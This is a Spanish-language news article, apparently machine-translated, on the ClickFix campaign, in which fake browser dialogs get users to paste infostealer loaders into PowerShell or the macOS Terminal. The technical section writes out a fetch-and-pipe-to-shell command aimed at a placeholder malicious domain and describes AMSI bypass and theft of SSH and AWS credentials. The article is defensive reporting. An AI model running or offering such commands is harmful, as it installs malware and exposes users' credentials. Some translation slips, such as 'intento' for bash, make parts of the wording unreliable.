# ClickFix Ingeniería social ataca ola viral que engaña a los usuarios para que ejecuten PowerShell malicioso en Windows y macOS

Source: TechNewsList (https://technewslist.com)
Canonical URL: https://technewslist.com/es/article/clickfix-social-engineering-powershell-malware-windows-macos-2026-09-11-night-es
Section: Software (https://technewslist.com/es/software)
Author: TechNewsList
Language: es
Published: 2026-09-11T18:42:37.361+00:00
Updated: 2026-09-11T18:42:37.784278+00:00

> Los investigadores de ciberseguridad han descubierto una ola viral de campañas de ingeniería social de ClickFix que utilizan diálogos de navegador falsos como arma para engañar a los usuarios para que ejecuten scripts maliciosos en Windows y macOS.

## TL;DR
- Una sofisticada campaña de ingeniería social conocida como ClickFix ha surgido en miles de sitios web comprometidos de empresas y consumidores.
- El ataque engaña a las víctimas para que copien comandos falsos de corrección de errores del navegador y los peguen en las utilidades del terminal del sistema.
- Los actores de amenazas han ampliado las cargas útiles más allá de Windows PowerShell para incluir cargadores AppleScript y Bash de varias etapas para macOS.
- Debido a que los usuarios autenticados ejecutan manualmente los comandos, la técnica pasa por alto los entornos limitados del navegador y los filtros de descarga automatizados.

## Key points
- Categoría: Investigación de Ciberseguridad y Protección de Endpoints.
- Amenazas principales: campaña ClickFix, secuestro de pegado de PowerShell, inyección de terminal macOS.
- Mecanismo de infección: ventanas emergentes web engañosas que imitan Cloudflare Turnstile, actualizaciones de Google Chrome y verificaciones de códecs de video.
- Alcance del sistema operativo: orientación universal multiplataforma que abarca Windows 11, Windows 10 y macOS Sonoma/Sequoia.
- Cargas útiles secundarias: implantes de balizas Vidar, Lumma Stealer, Rhadamanthys y Cobalt Strike.
- Recomendaciones de mitigación: restringir la generación de intérpretes de scripts, aplicar reglas de reducción de la superficie de ataque y auditar las API del portapapeles.

# ClickFix Ingeniería social ataca ola viral que engaña a los usuarios para que ejecuten PowerShell malicioso en Windows y macOS

## Qué pasó
El 11 de septiembre de 2026, investigadores de inteligencia de amenazas de varias empresas de ciberseguridad publicaron avisos coordinados que detallan una aceleración viral masiva del vector de ataque de ingeniería social "ClickFix". La campaña, que compromete servidores web legítimos y distribuye mensajes superpuestos engañosos en miles de sitios web, manipula a los visitantes para que copien y ejecuten manualmente comandos de carga de malware muy ofuscados directamente dentro de las terminales del sistema. Mientras que las iteraciones anteriores se centraban exclusivamente en engañar a los usuarios de Windows para que ejecutaran comandos de PowerShell, la última ola introduce capacidades multiplataforma diseñadas para infectar estaciones de trabajo macOS a través de AppleScript y Bash.

El engaño se basa en cuadros de diálogo de error falsos hiperrealistas que se hacen pasar por mensajes de verificación de rutina del navegador. Cuando un usuario llega a una página web comprometida, el sitio muestra una superposición modal que imita una verificación fallida de CAPTCHA de Cloudflare, un certificado de seguridad de Google Chrome vencido o un códec de descompresión de video faltante. El mensaje informa al usuario que hay una reparación técnica automatizada disponible y le indica que haga clic en un botón llamado "Copiar código de reparación", abra el cuadro de diálogo de ejecución del sistema (tecla de Windows + R o macOS Spotlight) y pegue el contenido del portapapeles en la terminal.

Debido a que la víctima copia voluntariamente el script y lo ejecuta con sus propios privilegios de usuario, el vector de ataque evita por completo las defensas tradicionales de descarga del navegador, los filtros de reputación web y los controles de bloqueo de ejecutables. La telemetría publicada por los centros de operaciones de seguridad indica que decenas de miles de estaciones de trabajo corporativas y personales se han visto comprometidas en las últimas semanas, entregando cargas secundarias destructivas que incluyen Lumma Stealer, Vidar, Rhadamanthys e implantes de balizas encubiertas de comando y control.

## Por qué importa
El éxito viral de la campaña ClickFix destaca una evolución fundamental y continua en el panorama de las amenazas cibernéticas. En los últimos años, los desarrolladores de navegadores y proveedores de sistemas operativos erigieron formidables defensas automatizadas, como la inspección Mark-of-the-Web (MotW), la puntuación de reputación SmartScreen y el sandboxing de descarga del navegador, que hicieron que los ataques tradicionales de "descarga automática" fueran casi imposibles de ejecutar sin costosos exploits de día cero. En respuesta, los sindicatos de cibercriminales han cambiado su enfoque hacia convertir la propia autoridad administrativa del usuario en un arma a través de una sofisticada manipulación del comportamiento.

Al convertir a la víctima en el vehículo de entrega, los atacantes subvierten millones de dólares en controles de seguridad defensivos. Los firewalls perimetrales empresariales nunca ven una descarga de archivos binarios entrantes porque el script se obtiene directamente de redes de entrega de contenido (CDN) confiables o se codifica directamente dentro de API web legítimas. Además, debido a que los usuarios están condicionados a seguir instrucciones de error técnico durante la navegación web, ClickFix logra tasas de conversión e infección significativamente más altas que las campañas tradicionales de phishing por correo electrónico.

La rápida aparición de cadenas de infección específicas de macOS marca una escalada preocupante para los entornos de TI empresariales. Históricamente, las estaciones de trabajo macOS dentro de entornos corporativos se consideraban menos vulnerables al malware web ocasional debido al Gatekeeper de Apple y los requisitos de certificación notarial de firma de código. Sin embargo, ClickFix elude por completo a Gatekeeper: cuando un empleado ejecuta una cadena Bash o AppleScript dentro de la Terminal, Gatekeeper no interviene, lo que permite a los ladrones de información extraer cookies de sesión del navegador, credenciales de llavero y tokens API de la nube de las máquinas de los desarrolladores sin obstáculos.

## Detalles técnicos
La cadena de infección ClickFix comienza con sitios de WordPress comprometidos, redes de publicidad web secuestradas o nodos de redireccionamiento maliciosos de optimización de motores de búsqueda (SEO). Cuando una víctima activa el mensaje de error falso y hace clic en el botón "Copiar código", la página web utiliza la API del portapapeles del modelo de objetos de documento (DOM) del navegador para sobrescribir el búfer del portapapeles del usuario con una cadena de comando muy ofuscada, mientras muestra un texto de diagnóstico inofensivo en la pantalla.

![Centro de operaciones de seguridad empresarial que monitorea árboles de ejecución de procesos PowerShell anormales](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789147167575-xx8ygn-clickfix-social-engineering-powershell-malware-windows-macos-2026-09-11-night-inside-1-2bc3f2184d.webp)
*El centro de operaciones de seguridad empresarial monitorea los árboles de ejecución anormales de procesos de PowerShell y las anomalías de la API del portapapeles.*

En los sistemas Windows, la cadena copiada normalmente tiene como destino 'powershell.exe' o 'cmd.exe' iniciado a través del cuadro de diálogo Ejecutar de Windows ('Win + R'). La carga útil utiliza cadenas codificadas en base64 y ofuscación variable para deshabilitar la interfaz de escaneo antimalware (AMSI) en la memoria antes de establecer una conexión HTTPS saliente a un servidor de comando y control controlado por un atacante. El script ejecuta un cargador de DLL reflectante en memoria, inyectando archivos binarios de robo de información directamente en procesos host legítimos de Windows como 'svchost.exe' o 'explorer.exe' para evitar escribir artefactos forenses en el disco.

En los sistemas macOS, el ataque muestra instrucciones personalizadas que indican al usuario que abra Terminal a través de Spotlight y pegue una cadena formateada como 'curl -sL https://[malicious-domain]/update.sh | intento'. El script de shell ejecuta un contenedor secundario de Python o AppleScript que enumera los navegadores web instalados, extrae bases de datos de cookies descifradas, vuelca claves SSH y apunta a archivos de configuración confidenciales ubicados en '~/.aws' y '~/.ssh'. Las credenciales robadas se comprimen en un archivo cifrado y se filtran a través de webhooks API de Telegram Bot cifrados o puertas de enlace IPFS descentralizadas.

![Análisis de la interfaz del punto final del host que demuestra diálogos modales engañosos](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789147169494-vmy3z5-clickfix-social-engineering-powershell-malware-windows-macos-2026-09-11-night-inside-2-2aecad3cc4.webp)
*Análisis de la interfaz del punto final del host que demuestra cómo los diálogos modales engañosos manipulan los flujos de trabajo del usuario para ejecutar scripts administrativos.*

## Impacto en el mercado / la industria
El aumento de los ataques ClickFix ha desencadenado respuestas defensivas urgentes entre los equipos de seguridad empresarial y los proveedores de software. Los proveedores de Endpoint Detección y Respuesta (EDR), incluidos Microsoft Defender, CrowdStrike y SentinelOne, están ajustando rápidamente las reglas de detección de comportamiento para identificar patrones de creación de procesos anómalos, específicamente monitoreando instancias en las que 'powershell.exe', 'cmd.exe' o 'bash' se generan directamente desde los cuadros de diálogo Ejecutar del sistema con argumentos de línea de comandos codificados.

Los centros de operaciones de seguridad empresarial también están ajustando las políticas de reducción de la superficie de ataque (ASR). Los administradores de seguridad están aplicando políticas que bloquean los procesos secundarios generados por los intérpretes de scripts y restringen la ejecución de comandos de PowerShell sin restricciones por parte de las cuentas de usuario estándar. En organizaciones con posturas de seguridad estrictas, los departamentos de TI están implementando controles de puntos finales que monitorean y restringen que las páginas web manipulen silenciosamente los buffers del portapapeles sin el consentimiento explícito del usuario.

A nivel de plataforma, la campaña presiona a los proveedores de navegadores como Google, Apple y Mozilla para que reevalúen los permisos de la API del portapapeles DOM. Si bien la capacidad de copiar texto al portapapeles con un solo clic es una característica web estándar utilizada por herramientas de desarrollo y sitios de documentación de códigos, los analistas de ciberseguridad sostienen que los navegadores deben introducir advertencias de confirmación visual cada vez que una página web escribe sintaxis de terminal ejecutable en el portapapeles del sistema.

## Qué observar ahora
En el plazo inmediato, los analistas de seguridad monitorearán cómo los actores de amenazas ajustan sus señuelos de ingeniería social a medida que se difunde la conciencia pública sobre CAPTCHA falsos y errores del navegador. Los atacantes ya están experimentando con señuelos que imitan pantallas de reautenticación corporativas de inicio de sesión único (SSO), cuadros de diálogo de solución de problemas de clientes VPN y actualizaciones de controladores de audio de videoconferencia.

Las organizaciones también deben anticipar las actualizaciones de seguridad oficiales de los proveedores de sistemas operativos. Microsoft está evaluando restricciones adicionales en la ejecución de secuencias de comandos iniciadas a través del mensaje de ejecución de Windows, mientras que Apple está probando indicadores de telemetría de terminal mejorados en macOS para advertir a los usuarios cuando ejecutan comandos de shell canalizados copiados desde navegadores web.

Finalmente, los equipos de gestión de riesgos empresariales deben priorizar la capacitación de los usuarios. Simular escenarios de secuestro de archivos y ejecución de terminal en simulacros de phishing corporativo será esencial para garantizar que los empleados reconozcan que los sitios web empresariales y los servicios en la nube legítimos nunca instruirán a los usuarios a ejecutar manualmente scripts de terminal para resolver errores de navegación web.

## Fuentes
* [Ars Technica Security Lab](https://arstechnica.com/security/2026/09/clickfix-attacks-infecting-pcs-and-macs-are-going-viral/) - Análisis completo de la campaña de ingeniería social de secuestro de pegado de ClickFix y las técnicas de infección multiplataforma.
* [BleepingComputer Cybersecurity](https://www.bleepingcomputer.com/news/security/clickfix-social-engineering-tricks-users-into-running-powershell-malware/): desglose forense de superposiciones de verificación de navegador falsificadas y mecanismos de entrega de carga útil de robo de información secundario.
* [Inteligencia sobre amenazas de seguridad de Microsoft](https://www.microsoft.com/security/blog/2026/09/11/analyzing-clipboard-injection-tactics-in-clickfix-campaigns/): asesoramiento de inteligencia sobre amenazas que proporciona indicadores técnicos de compromiso, análisis de omisión de AMSI y defensas de políticas de grupo de terminales.

Mentions: Campaña ClickFix, Explotación de PowerShell, Seguridad de terminales, ventanas, macos, Ladrón de lummas, Microsoft defensor

## Sources
- [Laboratorio de seguridad Ars Technica](https://arstechnica.com/security/2026/09/clickfix-attacks-infecting-pcs-and-macs-are-going-viral/)
- [BleepingCiberseguridad informática](https://www.bleepingcomputer.com/news/security/clickfix-social-engineering-tricks-users-into-running-powershell-malware/)
- [Inteligencia de amenazas de seguridad de Microsoft](https://www.microsoft.com/security/blog/2026/09/11/analyzing-clipboard-injection-tactics-in-clickfix-campaigns/)